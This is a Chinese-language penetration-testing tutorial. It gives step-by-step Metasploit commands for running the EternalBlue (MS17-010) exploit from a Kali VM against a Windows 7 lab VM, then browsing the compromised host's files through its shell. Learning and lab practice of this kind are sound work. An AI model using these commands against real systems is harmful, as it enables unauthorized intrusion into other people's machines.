網絡安全工程師演示：原來黑客是這樣獲取你的計算機管理員權限的！【滲透】

課前聲明：
1、本分享僅做學習交流，請自覺遵守法律法規！
2、搜索：Kali 與編程，學習更多網絡攻防乾貨！
3、Kali 與編程每天準時更新，敬請學習和關注！
正文部分
一、背景介紹
Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework，簡稱叫做MSF。Metasploit作爲全球最受歡迎的工具，不僅僅是因爲它的方便性和強大性，更重要的是它的框架。它允許使用者開發自己的漏洞腳本，從而進行測試。Metasploit(msf)究竟威力如何呢？如何利用木馬控制受害者主機呢？接下來讓我們一起學習！
二、資源裝備
1.安裝好 Win7的虛擬機一臺
2.整裝待發的小白一個。
3.安裝好的Kali Linux虛擬機一臺。
三、戰略安排
3.1 利用Metasploit（msf）滲透框架對目標主機進行攻擊，如下圖所示。
步驟1：啓動Metasploit（msf）滲透框架，如下圖所示。
命令：msfconsole

步驟2：Metasploit（msf）滲透框架啓動成功，如下圖所示。

步驟3：檢索漏洞，如下圖所示。
命令：search 漏洞編號
例子：search ms17-010

步驟4：檢索到有關漏洞的利用模塊如下圖所示。
步驟5：選擇對應的漏洞利用模塊並使用，如下圖所示。
命令：use 漏洞利用模塊名稱
例子：use exploit/windows/smb/ms17_010_eternalblue

步驟6：查看使用的漏洞模塊需要設置的參數，如下圖所示。。
命令：show option
步驟7：設置攻擊參數，如下圖所示。
命令：set rhosts 受害者主機IP
例子：set rhosts 192.168.78.160

步驟8：查看對應的參數是否設置成功，如下圖所示。
命令：show options

步驟9：運行漏洞利用模塊，如下圖所示。
命令：run

步驟10：如下圖所示，成功拿下目標主機
提示：ETERNALBLUE overwrite completed successfully!

3.2 進入後滲透階段，利用DOS命令控制目標主機，如下圖所示。
步驟1：進入Windows系統的cmd窗口，如下圖所示。

步驟2：利用命令查看受害者主機的文件夾信息，如下圖所示。
命令：dir
切換文件夾目錄：cd 文件夾名
切換盤符：cd 盤符名



小編一個個字敲打創作，可辛苦了，問君可否關注一下我呢？你還可搜索:Kali與編程，學習更多黑客滲透技巧呢 ！拒絕盜版，轉載請聲明來源：Kali與編程
點我學習更多Kali Linux滲透測試與網絡攻防實戰技巧！